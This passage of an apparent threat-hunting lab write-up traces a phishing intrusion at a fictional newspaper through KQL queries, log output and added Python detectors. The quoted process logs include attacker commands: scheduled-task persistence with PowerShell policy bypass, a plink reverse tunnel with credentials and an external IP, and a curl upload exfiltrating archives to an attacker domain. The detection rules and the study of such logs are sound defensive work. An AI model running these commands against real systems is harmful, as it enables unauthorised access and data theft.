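INTERNAL_DOMAIN = "valdoriantimes.news"   # the newspaper's own mail domain

# Constructed sample rows: (timestamp, sender, reply_to, recipient, verdict, link).
# The last row is a benign control that must not be flagged.
EMAIL_ROWS = [
    ("2024-01-03 06:39:22", "valdorias_best_recruiter@gmail.com",
     "valdorias_best_recruiter@gmail.com", "ida_tarbell@valdoriantimes.news", "SUSPICIOUS",
     "http://hirerecruit.org/search/online/published/Stop_Being_So_Broke_Get_Money_Now.docx"),
    ("2024-01-04 05:16:25", "ida_tarbell@valdoriantimes.news",
     "ida_tarbell@valdoriantimes.news", "jim_mckay@valdoriantimes.news", "CLEAN",
     "https://promotionrecruit.com/modules/public/published/share/signin"),
    ("2024-01-05 09:42:05", "newspaper_jobs@gmail.com",
     "newspaper_jobs@gmail.com", "sonia_gose@valdoriantimes.news", "CLEAN",
     "https://promotionrecruit.com/published/Valdorian_Times_Editorial_Offer_Letter.docx"),
    ("2024-01-09 03:58:13", "valdorias_best_recruiter@gmail.com",
     "newspaper_jobs@gmail.com", "tom_brokaw@valdoriantimes.news", "SUSPICIOUS",
     "http://hire-recruit.info/images/online/published/Stop_Being_So_Broke_Get_Money_Now.docx"),
    ("2024-01-10 07:02:06", "tyler_byers@valdoriantimes.news",
     "tyler_byers@valdoriantimes.news", "seymour_hersh@valdoriantimes.news", "CLEAN",
     "https://hire-recruit.info/published/images/login"),
    ("2024-01-12 09:00:00", "hr@valdoriantimes.news",            # constructed benign control
     "hr@valdoriantimes.news", "jim_mckay@valdoriantimes.news", "CLEAN",
     "https://intranet.valdoriantimes.news/benefits/2024.docx"),
]


def link_domain(link):
    """Host part of a link, lower-cased (the KQL parse_url(link).Host step)."""
    return (urlparse(link).hostname or "").lower()


def is_internal(address):
    return address.lower().endswith("@" + INTERNAL_DOMAIN)


def pivot_phishing(rows, seed_addresses):
    """Expand a seed set of attacker addresses to a fixed point:
    addresses -> domains they linked to -> external addresses that linked
    to those domains -> ...  Internal senders are never added to the
    attacker set (the rest of their mail is legitimate); they are returned
    separately as likely compromised accounts."""
    bad_addresses = {a.lower() for a in seed_addresses}
    bad_domains = set()
    while True:
        before = (len(bad_addresses), len(bad_domains))
        # Step 1: every link sent from (or replying to) a bad address marks its domain.
        for _ts, sender, reply_to, _rcpt, _verdict, link in rows:
            if sender.lower() in bad_addresses or reply_to.lower() in bad_addresses:
                domain = link_domain(link)
                if domain:
                    bad_domains.add(domain)
        # Step 2: every external address that linked to a bad domain is itself bad.
        for _ts, sender, reply_to, _rcpt, _verdict, link in rows:
            if link_domain(link) in bad_domains:
                for addr in (sender, reply_to):
                    if not is_internal(addr):
                        bad_addresses.add(addr.lower())
        if (len(bad_addresses), len(bad_domains)) == before:
            break   # nothing new was discovered in this pass
    matched = [r for r in rows if link_domain(r[5]) in bad_domains]
    compromised = sorted({r[1].lower() for r in matched if is_internal(r[1])})
    return {
        "external_senders": sorted(bad_addresses),
        "domains": sorted(bad_domains),
        "compromised_internal": compromised,
        "matched_rows": matched,
    }


if __name__ == "__main__":
    result = pivot_phishing(EMAIL_ROWS, ["newspaper_jobs@gmail.com"])
    for key in ("external_senders", "domains", "compromised_internal"):
        print(f"{key}: {result[key]}")
    for row in result["matched_rows"]:
        print("  ", row[0], row[1], "->", row[3], row[4])
```

Seeding with only newspaper_jobs@gmail.com, the first pass yields promotionrecruit.com and hire-recruit.info, the second pass pulls in valdorias_best_recruiter@gmail.com through the shared reply_to and therefore hirerecruit.org, and the third pass finds nothing new. Keeping internal accounts out of the attacker set is deliberate: an account that sent one phishing link is compromised, but flagging everything it ever sent would bury the analyst.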

Finally, just to check what other files could've dropped the malicious PowerShell script:

FileCreationEvents
| serialize
| extend next_file = next(filename)
| where next_file endswith ".ps1"
| where filename endswith ".docx"
| sort by timestamp asc
Query Results
timestamp hostname username sha256 path filename process_name next_file
2024-01-03 07:05:35.0000 LZD4-DESKTOP mazuckerberg 47eefdc06144552978b90231acc05903f19da7dd08429a2fe5785d9c26f5f737 C:\Users\mazuckerberg\Downloads\Stop_Being_So_Broke_Get_Money_Now.docx Stop_Being_So_Broke_Get_Money_Now.docx firefox.exe hacktivist_manifesto.ps1
2024-01-03 07:11:58.0000 CORG-DESKTOP kahopper 18ffc409d889bc9e5f3d6201485a3d58b204c66f3e3a8c759fe350924733dd86 C:\Users\kahopper\Downloads\Stop_Being_So_Broke_Get_Money_Now.docx Stop_Being_So_Broke_Get_Money_Now.docx firefox.exe hacktivist_manifesto.ps1
2024-01-03 07:20:56.0000 O5HM-MACHINE idtarbell c815025508a1ba3c7b68276194cac51b62526aa09c70a7157d971a84f31c3e12 C:\Users\idtarbell\Downloads\Stop_Being_So_Broke_Get_Money_Now.docx Stop_Being_So_Broke_Get_Money_Now.docx chrome.exe hacktivist_manifesto.ps1
2024-01-03 07:22:12.0000 C0MC-MACHINE lapage c4584eee4224e73097dce14321e489418cdbb5e70eee9b648b82554a034fbb80 C:\Users\lapage\Downloads\Stop_Being_So_Broke_Get_Money_Now.docx Stop_Being_So_Broke_Get_Money_Now.docx chrome.exe hacktivist_manifesto.ps1
2024-01-03 07:34:50.0000 Q8CS-LAPTOP peparket 09ad01734509e6edde6df79aadd7b539d8bf39d5066af987fd34eecb87974a8e C:\Users\peparket\Downloads\Stop_Being_So_Broke_Get_Money_Now.docx Stop_Being_So_Broke_Get_Money_Now.docx firefox.exe hacktivist_manifesto.ps1
2024-01-03 08:48:29.0000 PPKQ-LAPTOP neleaks 04a7f37b3e4da005f46b7bd53578f9165c7fb5eeafea469a77fa4695d1aa51fc C:\Users\neleaks\Downloads\Stop_Being_So_Broke_Get_Money_Now.docx Stop_Being_So_Broke_Get_Money_Now.docx firefox.exe hacktivist_manifesto.ps1
2024-01-05 10:01:44.0000 LSL7-DESKTOP bowoodward d146844f2ccc728a41c597b539716e5f2aae21390742879937d668f0a2f6a934 C:\Users\bowoodward\Downloads\Valdorian_Times_Editorial_Offer_Letter.docx Valdorian_Times_Editorial_Offer_Letter.docx firefox.exe hacktivist_manifesto.ps1
2024-01-05 10:24:04.0000 UL0M-MACHINE sogose 60b854332e393a6a2f0015383969c3ac705126a6b7829b762057a3994967a61f C:\Users\sogose\Downloads\Valdorian_Times_Editorial_Offer_Letter.docx Valdorian_Times_Editorial_Offer_Letter.docx edge.exe hacktivist_manifesto.ps1
2024-01-05 10:36:20.0000 RBLC-LAPTOP darather 6f27b43bcbcf67b6b489ff2c3a1795ef931222abb1a24f603f382728961c6f13 C:\Users\darather\Downloads\Valdorian_Times_Editorial_Offer_Letter.docx Valdorian_Times_Editorial_Offer_Letter.docx chrome.exe hacktivist_manifesto.ps1
2024-01-08 08:05:25.0000 3FUX-MACHINE chniles fa44f5c0765426d639d7430c548fb95b41fe80da8bed2e0461f7983a68a17f5a C:\Users\chniles\Downloads\Valdorian_Times_Editorial_Offer_Letter.docx Valdorian_Times_Editorial_Offer_Letter.docx chrome.exe hacktivist_manifesto.ps1
2024-01-08 10:53:27.0000 8E37-LAPTOP litorvalds 49f0fabe89ffbf9c8f56f110db31d1f2b0961ea810179451089531e45e1284be C:\Users\litorvalds\Downloads\Valdorian_Times_Editorial_Offer_Letter.docx Valdorian_Times_Editorial_Offer_Letter.docx chrome.exe hacktivist_manifesto.ps1
2024-01-09 08:10:12.0000 ZSD1-MACHINE tobrokaw ed66f757fc7b3f929f2414a7f5ea3823feea06f1a30d98dfd5253152eb82eabe C:\Users\tobrokaw\Downloads\Stop_Being_So_Broke_Get_Money_Now.docx Stop_Being_So_Broke_Get_Money_Now.docx Edge.exe hacktivist_manifesto.ps1
2024-01-09 08:36:12.0000 1OD0-MACHINE bawalters da5edbf67dc2e9b46e95dee8c2cbacf674bdea42acedabfb63c03e68242a4dcd C:\Users\bawalters\Downloads\Stop_Being_So_Broke_Get_Money_Now.docx Stop_Being_So_Broke_Get_Money_Now.docx edge.exe hacktivist_manifesto.ps1
2024-01-09 08:52:10.0000 W4PH-DESKTOP bigates 2a2b1606666523699311e46ad1dc6677d710aae96ad03395136abd10a60db0d1 C:\Users\bigates\Downloads\Stop_Being_So_Broke_Get_Money_Now.docx Stop_Being_So_Broke_Get_Money_Now.docx firefox.exe hacktivist_manifesto.ps1
2024-01-09 09:36:13.0000 JJ2F-MACHINE tybyers 215eac85821dea858beea40e5538c89b3728a39ad84bf5c533da4585ed01e623 C:\Users\tybyers\Downloads\Stop_Being_So_Broke_Get_Money_Now.docx Stop_Being_So_Broke_Get_Money_Now.docx edge.exe hacktivist_manifesto.ps1
2024-01-10 08:55:17.0000 A37A-DESKTOP romclovin fa092856280dbddbc08d48ca996ac58eda22f1db978960c9c92ad0bd13ee197e C:\Users\romclovin\Downloads\Editorial_J0b_Openings_2024.docx Editorial_J0b_Openings_2024.docx firefox.exe hacktivist_manifesto.ps1
2024-01-10 09:03:39.0000 KOVZ-DESKTOP sehersh ecf7011bdd3fe16b6af6e35de8297ae20021dacce431a04cb692a8b363e82ca8 C:\Users\sehersh\Downloads\Editorial_J0b_Openings_2024.docx Editorial_J0b_Openings_2024.docx Edge.exe hacktivist_manifesto.ps1
2024-01-10 09:40:40.0000 KOVZ-DESKTOP sehersh 44158b15ce4d61211a6e584a77ebd4f634af5bc587f321c6de9484db0fe721ef C:\Users\sehersh\Downloads\Editorial_J0b_Openings_2024.docx Editorial_J0b_Openings_2024.docx firefox.exe hacktivist_manifesto.ps1
2024-01-12 11:39:02.0000 FQEI-LAPTOP crzimmerman 6a6d260236b9d8f5a1b77a4778cced5a9162d3fe0f874e4b8c25a11b0fc69b67 C:\Users\crzimmerman\Downloads\Editorial_J0b_Openings_2024.docx Editorial_J0b_Openings_2024.docx edge.exe hacktivist_manifesto.ps1
2024-01-15 08:53:45.0000 WOJY-LAPTOP kebut 7e1c293bf306f622e7ac450c9913511ddd2f0b1cccbb72ddf70ec86c5f43f62c C:\Users\kebut\Downloads\Valdorian_Times_Editorial_Offer_Letter.docx Valdorian_Times_Editorial_Offer_Letter.docx edge.exe hacktivist_manifesto.ps1
2024-01-15 09:37:16.0000 MVBT-MACHINE stjobs 7b51e036f215f9c87e51bd31139878c07e96916424a6d3d6972cf111fa3220ab C:\Users\stjobs\Downloads\Valdorian_Times_Editorial_Offer_Letter.docx Valdorian_Times_Editorial_Offer_Letter.docx firefox.exe hacktivist_manifesto.ps1

This matches my previous discovery of 21 distinct employee devices infected with the PowerShell script. As a final check, I wanted to see what the SecurityAlerts table had flagged, if anything.

SecurityAlerts
| where * contains "Stop_Being_So_Broke_Get_Money_Now.docx"
or * contains "Valdorian_Times_Editorial_Offer_Letter.docx"
or * contains "Editorial_J0b_Openings_2024.docx"
or * contains "newspaper_jobs@gmail.com"
or * contains "valdorias_best_recruiter@gmail.com"
Query Results
timestamp alert_type severity description indicators
2024-01-05 09:59:24.0000 HOST high A suspicious file was quarantined on host 1OD0-MACHINE: Valdorian_Times_Editorial_Offer_Letter.docx [{'hostname': '1OD0-MACHINE', 'filename': 'Valdorian_Times_Editorial_Offer_Letter.docx', 'sha256': '42991c2abf947fe8e502e74c3149c98b3e954c619881e74f37e23c02321c109b'}]
2024-01-08 08:20:33.0000 HOST high A suspicious file was quarantined on host ZSD1-MACHINE: Valdorian_Times_Editorial_Offer_Letter.docx [{'hostname': 'ZSD1-MACHINE', 'filename': 'Valdorian_Times_Editorial_Offer_Letter.docx', 'sha256': 'e49b603f55f459570f9c0c7f6c76cc6b0119f28f4617cf5c2716d132f1406c16'}]

Despite malicious .docx files existing across 21 distinct devices, only two were quarantined (the hostnames belong to two Directors of News Operations); no security alerts were raised about the emails themselves (e.g. nobody reported them as suspicious).
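The FileCreationEvents query above pairs each .docx with whatever row happens to follow it in global order, which works on this dataset but would pair a .docx on one host with a .ps1 on another. As an added example (Python, not the write-up's KQL and not KC7's code), here is the same docx-then-ps1 detection partitioned per host and bounded by a time window, run over constructed file events; the A37A-DESKTOP pair is adapted from the output above, and the other hostnames, users and files are placeholders chosen to show the two failure modes of the naive approach.

```python
"""Flag a .docx creation followed shortly by a .ps1 creation on the same
host. Added example in Python, not the write-up's KQL: it partitions by
host and uses a time window instead of global next() adjacency, so a .ps1
written on another host or hours later is not paired with the .docx.
All events are constructed; hosts other than A37A-DESKTOP are placeholders."""
from collections import defaultdict
from datetime import datetime, timedelta

DEFAULT_WINDOW = timedelta(minutes=5)

# Constructed FileCreationEvents rows: (timestamp, hostname, username, filename, process_name)
FILE_EVENTS = [
    ("2024-01-10 08:55:17", "A37A-DESKTOP", "romclovin", "Editorial_J0b_Openings_2024.docx", "firefox.exe"),
    ("2024-01-10 08:55:51", "A37A-DESKTOP", "romclovin", "hacktivist_manifesto.ps1", "WINWORD.EXE"),
    ("2024-01-10 09:00:00", "HOST-B", "ubravo", "Q1_Budget.docx", "chrome.exe"),        # benign download
    ("2024-01-10 09:00:20", "HOST-C", "ucharlie", "maintenance.ps1", "explorer.exe"),    # admin script, other host
    ("2024-01-10 09:30:00", "HOST-D", "udelta", "Offer_Letter.docx", "edge.exe"),
    ("2024-01-10 12:30:00", "HOST-D", "udelta", "cleanup.ps1", "powershell.exe"),       # 3 h later: unrelated
]


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def naive_next_pairs(events):
    """The write-up's approach: global time order, pair each .docx with the
    very next row when that row is a .ps1, regardless of host or delay."""
    ordered = sorted(events, key=lambda e: parse_ts(e[0]))
    hits = []
    for cur, nxt in zip(ordered, ordered[1:]):
        if cur[3].lower().endswith(".docx") and nxt[3].lower().endswith(".ps1"):
            hits.append({"hostname": cur[1], "docx": cur[3], "ps1": nxt[3], "ps1_host": nxt[1]})
    return hits


def windowed_dropper_pairs(events, window=DEFAULT_WINDOW):
    """Per host, pair each .docx with the first .ps1 created on that same
    host within `window`; .ps1 files on other hosts or outside it are ignored."""
    by_host = defaultdict(list)
    for ev in events:
        by_host[ev[1]].append(ev)
    hits = []
    for host, evs in by_host.items():
        evs.sort(key=lambda e: parse_ts(e[0]))
        for i, ev in enumerate(evs):
            if not ev[3].lower().endswith(".docx"):
                continue
            t0 = parse_ts(ev[0])
            for later in evs[i + 1:]:
                delta = parse_ts(later[0]) - t0
                if delta > window:
                    break           # sorted per host: nothing later can qualify
                if later[3].lower().endswith(".ps1"):
                    hits.append({"hostname": host, "username": ev[2], "docx": ev[3],
                                 "ps1": later[3], "ps1_process": later[4],
                                 "seconds": int(delta.total_seconds())})
                    break
    return hits


if __name__ == "__main__":
    print("naive pairs:", naive_next_pairs(FILE_EVENTS))
    print("windowed pairs:", windowed_dropper_pairs(FILE_EVENTS))
```

On the constructed events the naive pairing reports three droppers, two of them wrong (a cross-host pair and a three-hour gap), while the windowed version reports only the A37A-DESKTOP pair, 34 seconds apart. The process that created the .ps1 (WINWORD.EXE here) is carried into the hit because it is the strongest signal that the document, not the user, wrote the script.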

Focusing back on Ronnie, we now have evidence that the threat actors hijacked employee accounts to steal further credentials; it stands to reason that Ronnie's account and device were hijacked with the PowerShell script for the purpose of planting a false, unapproved, defamatory article against an up-and-coming political candidate.

ProcessEvents
| where hostname == "A37A-DESKTOP"
and process_commandline !contains "WindowsApps"
and process_commandline !contains "Edge"
and process_commandline !contains "Chrome"
and process_commandline !contains "Firefox"
and process_commandline !contains "System32"
and process_commandline !contains "Teams"
and timestamp >= datetime(2024-01-10)
and timestamp <= datetime(2024-02-01)
Query Results
This table has been redacted; it only shows the most relevant findings, rather than the entire output of the KQL query above.
timestamp parent_process_name parent_process_hash process_commandline process_name process_hash hostname username
2024-01-10 08:55:50.0000 Explorer.exe 83e1c2993c7c14ad6b4a62aae41beb0555a00642a9088c812ac9bdcc1cab9fc9 "C:\Program Files\Microsoft Office\Office16\WINWORD.EXE" "C:\Users\romclovin\Downloads\Editorial_J0b_Openings_2024.docx" WINWORD.EXE 23883d248846d95019eeec07bb37f124218847692a2e9ba24028ccd572b4b589 A37A-DESKTOP romclovin
2024-01-10 08:55:51.0000 WINWORD.EXE b2cf56a0618bb164ddd605c3b843a823c70f55cf5c5136243325e6010c7aae19 C:\ProgramData\hacktivist_manifesto.ps1 hacktivist_manifesto.ps1 be2a5f0855f721d8f6b7042d6c50b34d6fb43e5ab77a431d91e985997c5adeff A37A-DESKTOP romclovin
2024-01-10 09:31:24.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f whoami cmd.exe 9e9cdaed6cfe1bc0eaf61a651253a1cb8b21dcafb44d125fc53efff76bb796f9 A37A-DESKTOP romclovin
2024-01-10 09:45:08.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f ipconfig cmd.exe 2671a7f4bbd9f4812429936c49606d0b88ca9d41ec3601041bc3bd24aa0b95bb A37A-DESKTOP romclovin
2024-01-10 10:16:09.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f arp -a cmd.exe 10efa5bbd1872787b3d990997142fc7058b943a2e89fd78d535bc5429d272170 A37A-DESKTOP romclovin
2024-01-10 10:26:32.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f schtasks /create /sc hourly /mo 5 /tn "Hacktivist Manifesto" /tr "powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\hacktivist_manifesto.ps1" schtasks.exe 6261ac0b3243e500a91444ffdca7a434bda847c82c54c27cee887e7713687883 A37A-DESKTOP romclovin
2024-01-10 10:35:46.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f tasklist /svc cmd.exe 84d82a381f558bd4ed20e29965dc179af23fff2f69cfb34ba675124c267e91b8 A37A-DESKTOP romclovin
2024-01-10 10:46:10.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f net view cmd.exe 22630f3fcc4c805374afdb489bca0686b6d4d55c116c216424edb416f38fa0ab A37A-DESKTOP romclovin
2024-01-10 11:13:21.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\hacktivist_manifesto.ps1 powershell.exe ff9136f9fe45d71bc5f4117b20b08e4ae8223e3b2c9867829200d0076d0e392c A37A-DESKTOP romclovin
2024-01-11 03:08:12.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f plink.exe -R 3389:localhost:3389 -ssh -l $had0w -pw thruthW!llS3tUfree 168.57.191.100 cmd.exe 68c24146c391b8c62cd9309d2898c3ee7c86ee6a3171b35c76cab3dc4b68afe6 A37A-DESKTOP romclovin
2024-01-31 10:26:20.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f move C:\Users\romclovin\Downloads\fakestory.docx C:\Users\romclovin\Documents\OpEdFinal_to_print.docx cmd.exe 24713a1129b719e9af97f7eeab6fb7f9e4aa94f162493a8b4e069df1f03a66da A37A-DESKTOP romclovin

Evidently, after obtaining hands-on-keyboard access to Ronnie's device, they downloaded a file named fakestory.docx, renamed it to OpEdFinal_to_print.docx and sent it to Clark Kent. A fellow investigator reports that the strange file was seen being downloaded by Ronnie's computer.

Employees
| where name == "Ronnie McLovin"
| distinct ip_addr
| lookup OutboundNetworkEvents on $left.ip_addr == $right.src_ip
| where tostring(parse_path(
    tostring(parse_url(url).Path)
    ).Filename)
    endswith ".docx"
Query Results
ip_addr timestamp method user_agent url
10.10.0.19 2024-01-10 08:55:07.0000 GET Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36 https://promotionrecruit.org/share/Editorial_J0b_Openings_2024.docx
10.10.0.19 2024-01-31 09:47:51.0000 GET Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36 https://hire-recruit.org/files/fakescandal/2024/fakestory.docx

First, Ronnie McLovin downloaded the malicious attachment on Jan. 10th 2024; 21 days later the attackers downloaded the fake story from their own server using their hands-on-keyboard access to Ronnie's computer. As noted previously (see [17]), this file was renamed and sent to Clark Kent 45 minutes later (see the timestamp at [3]).

Ronnie informs me that she has just received an email (2024-02-04) from her preferred dark web monitoring service, informing her that her personal information was leaked and put up for sale at hirerecruit.com. Slightly modifying our previous query to account for the new date, we find four new events:

Query Results
timestamp parent_process_name parent_process_hash process_commandline process_name process_hash hostname username
2024-01-31 11:44:58.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f 7z.exe a -t7z C:\Users\romclovin\Documents\MyStolenDataFromDocuments.7z C:\Users\romclovin\Documents\*.docx -p thruthW!llS3tUfree cmd.exe 9213e057cdc0690c892923da64501102349dbd334e8c33d9f15ebc50b0743f46 A37A-DESKTOP romclovin
2024-01-31 11:48:33.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f 7z.exe a -t7z C:\Users\romclovin\Documents\MyStolenDataFromDesktop.7z C:\Users\romclovin\Desktop\*.docx -p thruthW!llS3tUfree cmd.exe 097ecb4a7aa3b8ef4af608b6439ff9c8202c76e1c260d4e3f7ed77ab40064354 A37A-DESKTOP romclovin
2024-01-31 11:49:47.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f 7z.exe a -t7z C:\Users\romclovin\Documents\DankMemes.7z C:\Users\romclovin\Memes\*.jpg -p thruthW!llS3tUfree cmd.exe 772b8658b4cc968a57b1cb3160bdac5bc9119faa166cfb954d5f7ce3f961c895 A37A-DESKTOP romclovin
2024-02-01 02:14:32.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f curl -F "file=@C:\Users\romclovin\Documents\*.7z" https://hirejob.com/exfil_processor/upload.php cmd.exe 8b49eaf11c8332d422db83717360da2bad21fc78d6dd1dd9e1f5a6188fb391a9 A37A-DESKTOP romclovin

The attackers indiscriminately add Ronnie's files to various password-protected 7zip archives on Jan. 31st, and on Feb. 1st exfiltrate the data to a server under their control; the domain is hirejob.com. The archives were named MyStolenDataFromDocuments.7z, MyStolenDataFromDesktop.7z and DankMemes.7z. To cap off the investigation, we'll do a quick check of whether anyone else within the Valdorian Times had data exfiltrated.

ProcessEvents
| where process_commandline startswith "curl"
Query Results
timestamp parent_process_name parent_process_hash process_commandline process_name process_hash hostname username
2024-02-01 02:14:32.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f curl -F "file=@C:\Users\romclovin\Documents\*.7z" https://hirejob.com/exfil_processor/upload.php cmd.exe 8b49eaf11c8332d422db83717360da2bad21fc78d6dd1dd9e1f5a6188fb391a9 A37A-DESKTOP romclovin

The only individual who had their data exfiltrated was Ronnie McLovin.
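The ProcessEvents rows on A37A-DESKTOP show a full sequence that a detection engineer would want to alert on: host recon, a schtasks entry running PowerShell with the execution policy bypassed, a plink reverse tunnel, password-protected 7z archives and a curl file upload. As an added example (Python, not the case's own KQL or data), the following triages constructed ProcessEvents rows against one rule per behaviour and then links a collection hit to an upload hit on the same host, which is the combination worth paging on. The A37A-DESKTOP command lines are adapted from the output above with the credential, remote user and IP replaced by placeholders; the W4PH-DESKTOP rows are constructed benign look-alikes that must not match.

```python
"""Triage ProcessEvents command lines for the behaviours seen on Ronnie's
device and link collection to upload on the same host. Added example in
Python, not the write-up's KQL. Rows are constructed; credential, remote
user and IP are placeholders (198.51.100.10 is a documentation address)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# (technique tag, pattern). Windows tool flags are case-insensitive; plink, 7z
# and curl option letters are not (curl -f is --fail, -F is --form), so only
# the program name is matched case-insensitively for those three.
RULES = [
    ("discovery.host_recon",
     re.compile(r"^(?:whoami|ipconfig|arp|tasklist|net\s+view)(?:\s|$)", re.I)),
    ("persistence.schtasks_powershell_bypass",
     re.compile(r"^schtasks(?:\.exe)?(?:\s.*)?\s/create\s.*powershell(?:\.exe)?\s.*-executionpolicy\s+bypass", re.I)),
    ("c2.plink_reverse_tunnel",
     re.compile(r"^(?i:plink(?:\.exe)?)(?:\s.*)?\s-R\s+\d+:\S+:\d+")),
    ("collection.7z_password_archive",
     re.compile(r"^(?i:7z(?:\.exe)?)\s+a\s.*\s-p\S*")),
    ("exfil.curl_multipart_upload",
     re.compile(r"^(?i:curl(?:\.exe)?)(?:\s.*)?\s(?:-F|--form)\s+\S*@")),
]

# Constructed rows: (timestamp, hostname, username, process_commandline)
PROCESS_EVENTS = [
    ("2024-01-10 09:31:24", "A37A-DESKTOP", "romclovin", "whoami"),
    ("2024-01-10 10:26:32", "A37A-DESKTOP", "romclovin",
     r'schtasks /create /sc hourly /mo 5 /tn "Hacktivist Manifesto" /tr "powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\hacktivist_manifesto.ps1"'),
    ("2024-01-11 03:08:12", "A37A-DESKTOP", "romclovin",   # placeholder user, password and IP
     "plink.exe -R 3389:localhost:3389 -ssh -l REDACTED_USER -pw REDACTED_PASSWORD 198.51.100.10"),
    ("2024-01-31 11:44:58", "A37A-DESKTOP", "romclovin",
     r"7z.exe a -t7z C:\Users\romclovin\Documents\MyStolenDataFromDocuments.7z C:\Users\romclovin\Documents\*.docx -p REDACTED_PASSWORD"),
    ("2024-02-01 02:14:32", "A37A-DESKTOP", "romclovin",
     r'curl -F "file=@C:\Users\romclovin\Documents\*.7z" https://hirejob.com/exfil_processor/upload.php'),
    # Constructed benign activity on another host: none of these should match.
    ("2024-01-20 10:00:00", "W4PH-DESKTOP", "bigates", "curl -sS https://updates.example.invalid/health"),
    ("2024-01-20 10:05:00", "W4PH-DESKTOP", "bigates", r"7z.exe x C:\Users\bigates\Downloads\driver.7z"),
    ("2024-01-20 11:00:00", "W4PH-DESKTOP", "bigates", 'schtasks /query /tn "Nightly Backup"'),
]


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def triage(events):
    """Return one hit per (event, rule) match, in time order."""
    hits = []
    for ts, host, user, cmd in events:
        for technique, pattern in RULES:
            if pattern.search(cmd):
                hits.append({"ts": parse_ts(ts), "hostname": host, "username": user,
                             "technique": technique, "commandline": cmd})
    hits.sort(key=lambda h: h["ts"])
    return hits


def exfil_chains(hits, window=timedelta(hours=48)):
    """Pair each collection hit with the first upload hit on the same host
    within `window`: staging followed by upload is the pattern to page on,
    not either command on its own."""
    by_host = defaultdict(list)
    for h in hits:
        by_host[h["hostname"]].append(h)
    chains = []
    for host, hs in by_host.items():
        uploads = [h for h in hs if h["technique"].startswith("exfil.")]
        for c in (h for h in hs if h["technique"].startswith("collection.")):
            for u in uploads:
                if timedelta(0) <= u["ts"] - c["ts"] <= window:
                    chains.append((host, c["ts"], u["ts"]))
                    break
    return chains


if __name__ == "__main__":
    found = triage(PROCESS_EVENTS)
    for h in found:
        print(h["ts"], h["hostname"], h["username"], h["technique"])
    for host, c_ts, u_ts in exfil_chains(found):
        print(f"exfil chain on {host}: archived {c_ts}, uploaded {u_ts}")
```

The 7z-then-curl pair on A37A-DESKTOP sits about 14.5 hours apart, so a 48-hour window links them while a one-hour window does not; the window is the knob to tune against how patient the operator was in the page's own timeline. Anchoring each pattern at the start of the command line and requiring `/create`, `-R`, `a ... -p` and `-F ...@` keeps routine curl health checks, archive extraction and `schtasks /query` from matching.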